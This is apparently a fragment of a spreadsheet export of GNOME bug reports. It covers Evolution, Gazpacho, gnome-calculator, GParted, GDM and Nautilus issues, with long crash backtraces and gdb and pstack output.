/usr/lib/libgobject-2.0.so.0
#24 0x4127d2aa in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#25 0x4127d57a in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#26 0x40f32152 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
#27 0x40f31cec in gtk_widget_event () from /usr/lib/libgtk-x11-2.0.so.0
#28 0x40f41650 in _gtk_window_query_nonaccels ()
   from /usr/lib/libgtk-x11-2.0.so.0
#29 0x4046f88a in bonobo_window_get_accel_group ()
   from /opt/gnome2/lib/libbonoboui-2.so.0
#30 0x40e3596c in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#31 0x4126a525 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#32 0x4126a26b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#33 0x4127e10e in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#34 0x4127d2aa in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#35 0x4127d57a in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#36 0x40f32152 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
#37 0x40f31cec in gtk_widget_event () from /usr/lib/libgtk-x11-2.0.so.0
#38 0x40e35768 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
#39 0x40e342fa in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#40 0x41020241 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#41 0x412c4fc3 in unblock_source () from /usr/lib/libglib-2.0.so.0
#42 0x412c60f8 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#43 0x412c6559 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#44 0x412c6de7 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#45 0x405768f4 in bonobo_main () from /opt/gnome2/lib/libbonobo-2.so.0
#46 0x0809bc33 in main ()
#47 0x413278ae in __libc_start_main () from /lib/libc.so.6
Thread 6 (Thread 65541 (LWP 9199)):
#0  0x4133b768 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x407c2198 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x407bed4e in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x400a1d57 in e_msgport_wait ()
   from /opt/gnome2/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#4  0x400a266f in e_thread_busy ()
   from /opt/gnome2/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#5  0x407bfc60 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 49156 (LWP 9198)):
#0  0x4133b768 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x407c2198 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x407bed4e in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x400a1d57 in e_msgport_wait ()
   from /opt/gnome2/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#4  0x400a266f in e_thread_busy ()
   from /opt/gnome2/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#5  0x407bfc60 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 32771 (LWP 9197)):
#0  0x4133b768 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x407c2198 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x407bed4e in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x400a1d57 in e_msgport_wait ()
   from /opt/gnome2/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#4  0x400a266f in e_thread_busy ()
   from /opt/gnome2/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#5  0x407bfc60 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 16386 (LWP 9196)):
#0  0x4133b768 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x407c2198 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x407bed4e in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x400a1d57 in e_msgport_wait ()
   from /opt/gnome2/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#4  0x400a266f in e_thread_busy ()
   from /opt/gnome2/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#5  0x407bfc60 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 32769 (LWP 9195)):
#0  0x413eb5e7 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x407bf96e in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 16384 (LWP 9193)):
#0  0x407c6d2a in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#1  0x40266fd2 in libgnomeui_module_info_get ()
   from /opt/gnome2/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0x0809b735 in evolution_storage_set_view_factory_new_view ()
No symbol table info available.
#3  0x407c5895 in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#4  
No symbol table info available.
#5  0x4039d254 in e_table_item_redraw_range ()
   from /opt/gnome2/lib/libgal-2.0.so.3
No symbol table info available.
#6  0x4037af0d in e_cell_text_set_value () from
/opt/gnome2/lib/libgal-2.0.so.3
No symbol table info available.
#7  0x4037b117 in e_cell_text_set_value () from
/opt/gnome2/lib/libgal-2.0.so.3
No symbol table info available.
#8  0x4037cbfd in e_cell_text_set_value () from
/opt/gnome2/lib/libgal-2.0.so.3
No symbol table info available.
#9  0x4037501d in e_cell_leave_edit () from
/opt/gnome2/lib/libgal-2.0.so.3
No symbol table info available.
#10 0x403a2e1b in e_table_item_leave_edit ()
   from /opt/gnome2/lib/libgal-2.0.so.3
No symbol table info available.
#11 0x403a1716 in e_table_item_redraw_range ()
   from /opt/gnome2/lib/libgal-2.0.so.3
No symbol table info available.
#12 0x4082b5c5 in gnome_canvas_marshal_BOOLEAN__BOXED ()
   from /opt/gnome2/lib/libgnomecanvas-2.so.0
No symbol table info available.
#13 0x4126a525 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x4126a26b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x4127e10e in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x4127d2aa in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0x4127d6fe in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x40352cf5 in e_canvas_new () from /opt/gnome2/lib/libgal-2.0.so.3
No symbol table info available.
#19 0x40352ea7 in e_canvas_new () from /opt/gnome2/lib/libgal-2.0.so.3
No symbol table info available.
#20 0x40e3596c in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0x4126a525 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0x4126a26b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#23 0x4127e10e in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#24 0x4127d2aa in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#25 0x4127d57a in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0x40f32152 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#27 0x40f31cec in gtk_widget_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#28 0x40f41650 in _gtk_window_query_nonaccels ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0x4046f88a in bonobo_window_get_accel_group ()
   from /opt/gnome2/lib/libbonoboui-2.so.0
No symbol table info available.
#30 0x40e3596c in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0x4126a525 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#32 0x4126a26b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#33 0x4127e10e in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0x4127d2aa in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0x4127d57a in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#36 0x40f32152 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#37 0x40f31cec in gtk_widget_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#38 0x40e35768 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#39 0x40e342fa in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0x41020241 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#41 0x412c4fc3 in unblock_source () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#42 0x412c60f8 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#43 0x412c6559 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#44 0x412c6de7 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#45 0x405768f4 in bonobo_main () from /opt/gnome2/lib/libbonobo-2.so.0
No symbol table info available.
#46 0x0809bc33 in main ()
No symbol table info available.
#47 0x413278ae in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x407c6d2a in waitpid () from /lib/libpthread.so.0
Unknown reporter: lutz@tzi.de changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>mkestner</t>
  </si>
  <si>
    <t>lutz</t>
  </si>
  <si>
    <t>GAZPACHO-342302</t>
  </si>
  <si>
    <t>widget support</t>
  </si>
  <si>
    <t>RadioButton: group isn't restored after undo</t>
  </si>
  <si>
    <t>Undoing setting the radio button group property doesn't always restor the old value.
1) Create a window add a vbox
2) Add two radio buttons
3) Set the group of the first button to point to the second button
4) Undo
They are still in the same group.</t>
  </si>
  <si>
    <t>enkidude</t>
  </si>
  <si>
    <t>EVOLUTION-211124</t>
  </si>
  <si>
    <t>Evolution doesn't quit</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.14
Synopsis: Evolution doesn't quit
Bugzilla-Product: Evolution
Bugzilla-Component: Miscellaneous
Description:
I tried to quit Evolution by clicking on the close box in the main
window. The main window went away and what I'm guessing is the new Quit
dialog box popped up. But it was completely empty. I'm using KDE 2.2.1
on SuSE Linux 7.1. I can't close the dialog box by clicking the close
widget or by hitting Enter on the keyboard.
Unknown reporter: wesley@wesman.net changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>wesley</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-488830</t>
  </si>
  <si>
    <t>Hex radio button shortcut conflicts with Help menu shortcut</t>
  </si>
  <si>
    <t>In the scientific calculator the shortcut/accelerator/whatever for the Hex radio button used to be 'x'.  It's now 'H'.  Alt H is also the shortcut for the Help menu.  Is there any reason the radio button shortcut cannot be returned to 'x'? (Alt x doesn't seem to do anything else)</t>
  </si>
  <si>
    <t>GPARTED-349497</t>
  </si>
  <si>
    <t>livecd</t>
  </si>
  <si>
    <t>GPARTED</t>
  </si>
  <si>
    <t>Kernel PANIC when boot LiveCD</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Insert CD
2. Please  at boot prompt
3. Crash
Stack trace:
Other information:
The problem is caused by the linux apic module crashing typing this causes a sucessful boot
linux noapic initrd=initrd.gz root=/dev/ram0 init=/linuxrc ramdisk_size=16384
Some motherboards cause apic to crash (esp. newer ones the kernel guys haven't gotten their hands on) I'd recommend either defaulting to this or having a failsafe boot option.  Thanks</t>
  </si>
  <si>
    <t>paypal</t>
  </si>
  <si>
    <t>nateman1352</t>
  </si>
  <si>
    <t>GDM-342831</t>
  </si>
  <si>
    <t>gdm could provide -nodaemon option for compatibility</t>
  </si>
  <si>
    <t>Hi
A couple of weeks ago GDM lost the -nodaemon option when it transitioned over to using GOption.  This ended up causing problems in Fedora because our init scripts passed the old option and so GDM daemonized on start up.
This causes problems because we have code to watch for it to exit and restart it automatically.  Since it daemonizes it exits immediately and we end up restarting it over and over again in a tight loop causing the user's CPU usage to jump to 100%.
See http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=192461 for more details.
One potential solution would have been to change our initscripts to use --nodaemon instead of -nodaemon.  This would be a bit awkward because we use the same scripts for KDM and XDM and they only supported the one-dash variant of -nodaemon.
Another option would be to add support back to GDM for -nodaemon.  Arguably the command line interface of GDM is part of it's API so it would be nice if it still supported the -nodaemon option for backward compatibility with itself and XDM.</t>
  </si>
  <si>
    <t>NAUTILUS-48364</t>
  </si>
  <si>
    <t>SOLARIS: Nautilus core dumps on startup-CVS head build</t>
  </si>
  <si>
    <t xml:space="preserve">running on an Ultra 10 with a CVS head build from Thu Jun 14 03:46:03 GMT 2001.
Nautilus segvs on startup. This is Solaris specific.
----------------------------------------------
here is the pstack of the core file generated:
pepper 27 %pstack core
core 'core' of 1009:    nautilus
-----------------  lwp# 1 / thread# 1  --------------------
 ff0475e8 _ORBIT_skel_ConfigListener_notify (ff07598c ffbebca8 ffbebd58
ff045f00
 ff0469c0 0) + c28
 fee4bb70 ORBit_POA_handle_request (233968 e4f70 fee64390 23f240 ffbee054
23f22
4) + 4b4
 fee500dc ORBit_handle_incoming_request (233968 0 fe5ed4cc 0 0 0) + 298
 fee50574 ORBit_handle_incoming_message (233968 fee50408 1 ffbec01c 1
104b28) +
 16c
 fedf4a80 giop_recv_reply_buffer_use_multiple_2 (233968 ffbebf90 1 fee07120
104b
20 e3e28) + 150
 fedf6048 giop_recv_reply_buffer_use_2 (1048c0 ffbec01c 1 0 0 0) + 20
 ff0560c0 ConfigDatabase_lookup_with_locale (1056b0 19ecd8 fe122a8e ffbec01c
400
 ffbec0aa) + 1f8
 ff043330 gconf_engine_get_full (fabe0 19ecd8 fe122a8e 0 ffbec15c ffbec158)
+ 1
68
 ff2427f0 get      (105640 19ecd8 0 ffbec1dc ffbec1d8 ffbec1d4) + a4
 ff243574 gconf_client_get_without_default (105640 19ecd8 ffbec25c fe136000
fe13
c7a0 0) + 38
 fef190fc eel_gconf_is_default (19ecd8 ff003750 36c 0 6e74002f 6e740000) +
a8
 fef8444c preferences_preference_is_default (22bd80 fe2dace0 fe5d5c08 0 0
0) +
a8
 fef8503c preferences_key_make_for_getter (22bd80 230b08 20 0 6e74 ff00) +
11c
 fef87770 preferences_entry_update_cached_value (230b08 230b08 230b08 0 0
0) +
a8
 fef88ef4 preferences_global_table_insert (fe2dace0 ff003750 ff3e0778
ff3e0770 1
7824 0) + 270
 fef88fdc preferences_global_table_lookup_or_insert (fe2dace0 fe204ff0 45e 1
ff3
e0000 fe3308c0) + c8
 fef8943c eel_preferences_add_auto_string (fe2dace0 fe300eac fe300eac 0 0
0) +
194
 fe26d960 nautilus_font_factory_get_font_from_preferences (8 0 0 ffbec2e8
13715
 1) + 50
 00099c28 fm_icon_view_update_icon_container_fonts (2329c0 171620 8d410
2329c0 8
d410 0) + c4
 0009b430 create_icon_container (2329c0 146e58 e14bc 2329c0 2329c0 1) + ee0
000
99600 fm_icon_view_initialize (2329c0 232730 fe9b0f30 1c6a14 1c6a14 e3e28)
+ f8
 fe94eb28 gtk_type_new (99508 e1980 0 0 0 0) + 2dc
 fe8e9088 gtk_object_new (13215 0 b4c00 0 30353800 30353800) + 88
 0002d5a8 create_object (118f98 2326d0 ffbec938 ffbec9d0 74000000 74000000)
+ 4
8
 ff223404 _ORBIT_skel_GNOME_ObjectFactory_create_object (118f98 1047d0
ffbec9d0 2
d560 ff22322c 0) + 1d8
 fee4bb70 ORBit_POA_handle_request (1047d0 e4f70 fee64390 2326b8 ffbe58fc
23269
c) + 4b4
 fee500dc ORBit_handle_incoming_request (1047d0 0 fe5ed4cc 0 0 0) + 298
 fee50574 ORBit_handle_incoming_message (1047d0 fee50408 1 ffbecc94 1
104b28) +
 16c
 fedf4a80 giop_recv_reply_buffer_use_multiple_2 (1047d0 ffbecc08 1 fee07120
104b
20 e3e28) + 150
 fedf6048 giop_recv_reply_buffer_use_2 (1048c0 ffbecc94 1 0 0 0) + 20
 ff0560c0 ConfigDatabase_lookup_with_locale (1056b0 2389f0 fe122a8e ffbecc94
400
 ffbecd22) + 1f8
 ff043330 gconf_engine_get_full (fabe0 2389f0 fe122a8e 0 ffbecdd4 ffbecdd0)
+ 1
68
 ff2427f0 get      (105640 2389f0 0 ffbece54 ffbece50 ffbece4c) + a4
 ff243574 gconf_client_get_without_default (105640 2389f0 ffbeced4 fe136000
fe13
c7a0 0) + 38
 fef190fc eel_gconf_is_default (2389f0 ff003750 210 0 65006c00 65000000) +
a8
 fef8444c preferences_preference_is_default (19ab70 c33b8 fe5d5c08 0
ffbecfd8 f
fbecfd4) + a8
 fef8503c preferences_key_make_for_getter (19ab70 232628 24 0 6500 ff00) +
11c
 fef87770 preferences_entry_update_cached_value (232628 232628 232628 0 20
ffbe
d154) + a8
 fef88ef4 preferences_global_table_insert (c33b8 ff003750 0 0 81010100
ff0000)
+ 270
 fef88fdc preferences_global_table_lookup_or_insert (c33b8 1 1 f4348 0
21c690)
+ c8
 fef89b50 eel_preferences_add_auto_boolean (c33b8 e1970 e1970 170 fe8cdb38
1) +
 194
 0008ede0 fm_directory_view_initialize_class (238718 8e67c 130 4 3 238718)
+ 76
4
 fe94f4f8 gtk_type_class_init (13115 1c69d8 fe9b0f30 130 1c69d8 0) + 400
 fe94e7cc gtk_type_class (13115 ab8 e1980 0 0 0) + ec
 0008fe64 fm_icon_view_get_type (0 e193c 0 0 0 0) + 68
 00077ea0 fm_desktop_icon_view_get_type (0 b502c b4c00 0 35653100 35653100)
+ 2
c
 0002d624 create_object (118f98 2386b0 ffbed530 ffbed5c8 74000000 74000000)
+ c
4
 ff223404 _ORBIT_skel_GNOME_ObjectFactory_create_object (118f98 104830
ffbed5c8 2
d560 ff22322c 0) + 1d8
 fee4bb70 ORBit_POA_handle_request (104830 e4f70 fee64390 238698 ffbe65a4
23867
c) + 4b4
 fee500dc ORBit_handle_incoming_request (104830 0 fe5ed4cc 0 0 0) + 298
 fee50574 ORBit_handle_incoming_message (104830 fee50408 1 ffbed87c 4
104af0) +
 16c
 fedf4a80 giop_recv_reply_buffer_use_multiple_2 (104830 ffbed800 1 8
ffbed87c 1
b1e0c) + 150
 fedf6048 giop_recv_reply_buffer_use_2 (1aee90 ffbed87c 1 1 111ec4
ff2fe73c) +
20
 ff29c6d4 Bonobo_Unknown_ref (13f900 ffbed8f0 0 237008 0 237055) + f4
 ff2d2ab4 bonobo_object_dup_ref (13f900 0 fe9b0f30 1c60f0 1c60f0 1c5f4c) +
30
 ff1bff5c bonobo_ui_toolbar_control_item_construct (237008 13f900 16aed0
3400 1c
4fd4 1c61e0) + 18
 ff1c01a0 bonobo_ui_toolbar_control_item_new (13f900 1afc58 148550 0
726f6c00 7
26f6c00) + 54
 ff1bcc08 toolbar_build_control (0 1afc58 0 ffbedc48 2172d8 1c5484) + 150
 ff1bce9c impl_bonobo_ui_sync_toolbar_build (1a0650 1afc58 0 ffbedc48
2172d8 ff
1bce5c) + 40
 ff1b7f0c bonobo_ui_sync_build (1a0650 1afc58 0 ffbedc48 2172d8 ffbedc48) +
154
 ff1b3234 bonobo_ui_engine_sync (190400 1a0650 1afc58 2172d8 d18 ffbedc48)
+ 1d
c
 ff1b379c bonobo_ui_engine_update_node (190400 20f130 147f20 c00 0
fe3308c0) +
260
 ff1b3b84 bonobo_ui_engine_update (190400 16aed0 147f20 c00 11315 2260000)
+ 13
4
 ff1b440c bonobo_ui_engine_thaw (190400 1a0720 94 940000 226 ffbedd84) + dc
000
6fb3c nautilus_window_ui_update (1a0150 c1c00 ff042144 fe136000 0 ffbee12c)
+ 5
c
 00075998 nautilus_window_show (1a0150 0 100680 3400 ffbee1b8 ffbee1b4) +
178
 fe8cdbe4 gtk_marshal_NONE__NONE (1a0150 75820 0 ffbedfc8 dcf38 1c5100) + 8
fe9
137a4 gtk_signal_real_emit (1a0150 13 ffbedfc8 1 ffbee324 1c5100) + 1f0
fe910ea
4 gtk_signal_emit (1a0150 13 1710bc ffbedfc8 c715 1c5cf4) + 244
 fe95d0a8 gtk_widget_show (1a0150 1a0150 fe5ed4cc fe5ed4d0 67860 ac4) + 1ec
000
67808 position_and_show_window_callback (20a148 1a0150 20ac18 67738 1c5cb8
1c5c
f4) + d0
 fe23a068 ready_callback_call (1ac340 20ac18 20ac24 0 0 0) + 38
 fe23b928 call_ready_callbacks (1ac340 20b580 fa15 0 0 0) + f4
 fe23f308 nautilus_directory_async_state_changed (1ac340 0 1f9290 fe23f218
0 0)
 + f0
 ff354918 execute_queued_functions (1f91d0 0 fe5ed4cc fe5ed4d0 0 0) + ac
 fe5c7b74 g_idle_dispatch (ff35486c ffbee728 1f91d0 0 e5b40 0) + 4
 fe5c61ac g_main_dispatch (470 470 4d4 ac4 4d4 ac4) + 128
 fe5c6a70 g_main_iterate (fe5ed4cc fe5ed438 4d4 ac4 4d4 ac4) + 7e4
 fe5c733c g_main_run (14d5f8 fe7fae5c 118820 0 ff3e0000 ff3b0ed4) + b8
 fe8cbac8 gtk_main (2c00 18d2a8 18d2a8 148cd8 0 0) + 10c
 ff2cbb44 bonobo_main (1 0 0 0 0 1) + c
 0003f440 main     (1 ffbeeb4c ffbeeb54 e19f8 0 0) + 664
 000293f4 _start   (0 0 0 0 0 0) + 5c
-----------------  lwp# 2 / thread# 2  --------------------
 fe119290 _signotifywait (fe49e000 5c 0 0 0 0) + 8
 fe481d5c thr_yield (0 0 0 0 0 0) + 8c
-----------------  lwp# 3 / thread# 5  --------------------
 fe1198c0 _lwp_sema_wait (fdd09e30 fe49e000 0 fdd09d78 2501c fde0bd78) + c
 fe4794d0 _swtch   (fdd09d78 0 fe49e000 5 1 1ff) + 400
 fe478014 cond_wait (4356 177c98 fe49e000 177cb0 fdd09d78 0) + e4
 fe477f10 pthread_cond_wait (177cb0 177c98 177c98 0 0 0) + 8
 fd7b293c thread_entry (177c90 1c 18 14 10 fd7c8a48) + 84
 fe48bc08 _thread_start (177c90 0 0 0 0 0) + 40
-----------------  lwp# 4 / thread# 4  --------------------
 fe1198c0 _lwp_sema_wait (fde0be30 fe49e000 0 fde0bd78 2501c fdb05d78) + c
 fe4794d0 _swtch   (fde0bd78 0 fe49e000 5 1 1ff) + 400
 fe478014 cond_wait (4356 177ba0 fe49e000 177bb8 fde0bd78 0) + e4
 fe477f10 pthread_cond_wait (177bb8 177ba0 177ba0 0 0 0) + 8
 fd7b293c thread_entry (177b98 1c 18 14 10 fd7c8a48) + 84
 fe48bc08 _thread_start (177b98 0 0 0 0 0) + 40
-----------------  lwp# 5 / thread# 6  --------------------
 fe1198c0 _lwp_sema_wait (fdc07e30 fe49e000 0 fdc07d78 2501c fda03d78) + c
 fe4794d0 _swtch   (fdc07d78 0 fe49e000 5 1 1ff) + 400
 fe478014 cond_wait (4356 235098 fe49e000 2350b0 fdc07d78 0) + e4
 fe477f10 pthread_cond_wait (2350b0 235098 235098 0 0 0) + 8
 fd7b293c thread_entry (235090 1c 18 14 10 fd7c8a48) + 84
 fe48bc08 _thread_start (235090 0 0 0 0 0) + 40
-----------------  lwp# 6  --------------------------------
 fe116e54 _door_return (fd685d78 0 6000 fd715b7c 0 0) + 10
 fe481d5c thr_yield (0 0 0 0 0 0) + 8c
-----------------  lwp# 7 / thread# 7  --------------------
 fe1198c0 _lwp_sema_wait (fdb05e30 fe49e000 0 fdb05d78 2501c 0) + c
 fe4794d0 _swtch   (fdb05d78 0 fe49e000 5 1 1ff) + 400
 fe478014 cond_wait (4356 2351b0 fe49e000 2351c8 fdb05d78 0) + e4
 fe477f10 pthread_cond_wait (2351c8 2351b0 2351b0 0 0 0) + 8
 fd7b293c thread_entry (2351a8 1c 18 14 10 fd7c8a48) + 84
 fe48bc08 _thread_start (2351a8 0 0 0 0 0) + 40
-----------------  lwp# 8 / thread# 8  --------------------
 fe1198c0 _lwp_sema_wait (fda03e30 fe49e000 0 fda03d78 2501c fdd09d78) + c
 fe4794d0 _swtch   (fda03d78 0 fe49e000 5 1 1ff) + 400
 fe478014 cond_wait (4356 2352c8 fe49e000 2352e0 fda03d78 0) + e4
 fe477f10 pthread_cond_wait (2352e0 2352c8 2352c8 0 0 0) + 8
 fd7b293c thread_entry (2352c0 1c 18 14 10 fd7c8a48) + 84
 fe48bc08 _thread_start (235090 0 0 0 0 0) + 40
-----------------  lwp# 6  --------------------------------
 fe116e54 _door_return (fd685d78 0 6000 fd715b7c 0 0) + 10
 fe481d5c thr_yield (0 0 0 0 0 0) + 8c
-----------------  lwp# 7 / thread# 7  --------------------
 fe1198c0 _lwp_sema_wait (fdb05e30 fe49e000 0 fdb05d78 2501c 0) + c
 fe4794d0 _swtch   (fdb05d78 0 fe49e000 5 1 1ff) + 400
 fe478014 cond_wait (4356 2351b0 fe49e000 2351c8 fdb05d78 0) + e4
 fe477f10 pthread_cond_wait (2351c8 2351b0 2351b0 0 0 0) + 8
 fd7b293c thread_entry (2351a8 1c 18 14 10 fd7c8a48) + 84
 fe48bc08 _thread_start (2351a8 0 0 0 0 0) + 40
-----------------  lwp# 8 / thread# 8  --------------------
 fe1198c0 _lwp_sema_wait (fda03e30 fe49e000 0 fda03d78 2501c fdd09d78) + c
 fe4794d0 _swtch   (fda03d78 0 fe49e000 5 1 1ff) + 400
 fe478014 cond_wait (4356 2352c8 fe49e000 2352e0 fda03d78 0) + e4
 fe477f10 pthread_cond_wait (2352e0 2352c8 2352c8 0 0 0) + 8
 fd7b293c thread_entry (2352c0 1c 18 14 10 fd7c8a48) + 84
 fe48bc08 _thread_start (2352c0 0 0 0 0 0) + 40
-----------------  lwp# 9 / thread# 9  --------------------
 fe11765c lstat    (0 2fc0006 fd901894 2322f8 19ee54 2f) + 8
 fd762d8c find_or_create_trash_near (0 2fc0006 0 22d4a0 1ff 2322f8) + 1bc
 fd763140 do_find_directory (2fc0006 0 3e9 233470 0 1) + 27c
 fe4d5f10 gnome_vfs_find_directory_cancellable (1f 3e9 233470 0 1 1ff) +
170
 fd7b71c4 gnome_vfs_job_execute (235340 0 0 0 0 0) + 438
 fd7b5350 thread_routine (10 fd7b5314 2353e0 0 0 0) + 3c
 fd7b299c thread_entry (2353d8 1c 18 14 10 fd7c8a48) + e4
 fe48bc08 _thread_start (2353d8 0 0 0 0 0) + 40
-----------------  lwp# 10  --------------------------------
 fe119874 ___lwp_cond_wait (0 3b31fc97 fd643cb0 fe4a55b0 fe4a55c0 0) + 8
 fe478e28 _age     (fe49edc8 fe49edcc fe49e000 3 fe49e000 1) + 94
 fe47a450 _lwp_start (fd643d78 0 4000 fe00fc34 0 0) + 18
 fe481d5c thr_yield (0 0 0 0 0 0) + 8c
--------------------------  thread# 3  --------------------
 fe47d9bc _reap_wait (fe4a2a18 20920 0 fe49e000 0 0) + 38
 fe47d714 _reaper  (fe49ee40 fe4a4780 fe4a2a18 fe49ee18 1 fe400000) + 38
 fe48bc08 _thread_start (0 0 0 0 0 0) + 40
------------------------------------------------------
here is nautilus ran under GDB on startup:
here is the gdb of nautilus when the crash occurs:
GNU gdb 5.0
Copyright 2000 Free Software Foundation Inc.
GDB is free software covered by the GNU General Public License and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as sparc-sun-solaris2.9...
(gdb) run
Starting program: /opt/gnome-1.4/bin/nautilus
[New LWP 1]
[New LWP 2]
[New LWP 3]
[New LWP 4]
Message: Successfully registered
`OAFIID:nautilus_factory:bd1e1862-92d7-4391-963e-37
583f0daef3'
Message: Successfully registered `OAFIID:Bonobo_Moniker_std_Factory'
[New LWP 5]
Program received signal SIGSEGV Segmentation fault.
0xff0475e8 in _ORBIT_skel_ConfigListener_notify ()
   from /opt/gnome-1.4/lib/libgconf-1.so.1
(gdb) where
#0  0xff0475e8 in _ORBIT_skel_ConfigListener_notify ()
   from /opt/gnome-1.4/lib/libgconf-1.so.1
#1  0xfee4bb78 in ORBit_POA_handle_request (recv_buffer=0x107d10 poa=0xe5088)
    at orbit_poa.c:507
#2  0xfee500e4 in ORBit_handle_incoming_request (recv_buffer=0x107d10)
    at server.c:90
#3  0xfee5057c in ORBit_handle_incoming_message (recv_buffer=0x107d10)
    at server.c:160
#4  0xfedf4a88 in giop_recv_reply_buffer_use_multiple_2 ()
   from /opt/gnome-1.4/lib/libIIOP.so.0
#5  0xfedf6050 in giop_recv_reply_buffer_use_2 ()
   from /opt/gnome-1.4/lib/libIIOP.so.0
#6  0xff29c6dc in Bonobo_Unknown_ref () from /opt/gnome-1.4/lib/libbonobo.so.2
#7  0xff2d2abc in bonobo_object_dup_ref ()
   from /opt/gnome-1.4/lib/libbonobo.so.2
